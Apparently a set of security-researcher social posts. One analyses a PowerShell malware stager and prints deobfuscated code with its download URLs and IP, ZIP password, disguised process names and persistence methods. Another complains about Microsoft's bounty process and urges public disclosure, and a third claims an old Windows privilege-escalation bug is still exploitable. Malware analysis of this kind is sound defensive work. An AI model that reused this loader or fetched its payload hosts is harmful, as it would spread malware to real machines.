Jus

Another powerShell stager using XOR+hex obfuscation. It downloads a password-protected ZIP from cloud-flare-authenticator[.]link or 193.111.117[.]6, extracts cert.exe, executes it hidden, then establishes persistence via HKCU Run, Startup .lnk, user PATH modification, and a logon scheduled task. Classic multi-persistence loader behavior. Deobfuscated code: $ErrorActionPreference = "Stop"; $ urls = @("hxxps://cloud-flare-authenticator.link/iDXs9HOIpoTLZRE.zip", "http://193.111.117.6/iDXs9HOIpoTLZRE.zip"); $ pw = 'iDXs9HOIpoTLZRE'; $ z = "$env:TEMP\iDXs9HOIpoTLZRE[.]zip"; $ d = "$env:LOCALAPPDATA\cert_update"; $ exe = "$d\iDXs9HOIpoTLZRE.exe"; $ stealthNames = @("SysHostService", "WinLogonHelper", "RuntimeBrokerSvc", "SpoolerSubService") $ appName = $ stealthNames | Get-Random # Downloads ZIP, extracts with 7-Zip/WinRAR, executes payload hidden, # then persists via HKCU Run, Startup .lnk, PATH modification, and scheduled task.

For a report I've submit report to MSRC months ago, showed full remote capabilities. MSRC closed saying it's "Local only". I comment: "I showed a 0 click proof of concept here. Why was it closed?" MSRC:" The assessment decision remains unchanged." Me:"Ok but I proved remote with X PoC and you can see the video I've even attached a few months ago that shows it in action" MSRC: " Please feel free to submit a new report with additional details."

Yeah, nah. Big L for Microslop. Nobody has a moral obligation to hand over their hard earned discoveries for free. Pay up or shut up. You are owed nothing, and you will get nothing by stomping your feet like a petulant child because “[this is] an “unnecessary risk” that forced its security teams to work around the clock, to understand, protect customers and develop patches.” God forbid your people do their jobs and it cost you more money than paying the researcher. Good. I suggest anyone either disclose them publicly to light a fire under Microsoft’s ass or keep them to yourself. Make them feel the pain of not paying out appropriately to save them time. They have pulled the “doesn’t meet servicing criteria” then patch it next update one too many times for valid bugs. RE: https://t.co/prMIqJAkes

Microsoft "patched" a Windows bug in December 2020 that lets a standard user write to protected parts of the system that only SYSTEM should have access to. Basically you can take over the machine from a normal account. I just built the new exploit for it and ran it on my Windows 11 machine. Still works. Over 5 years later.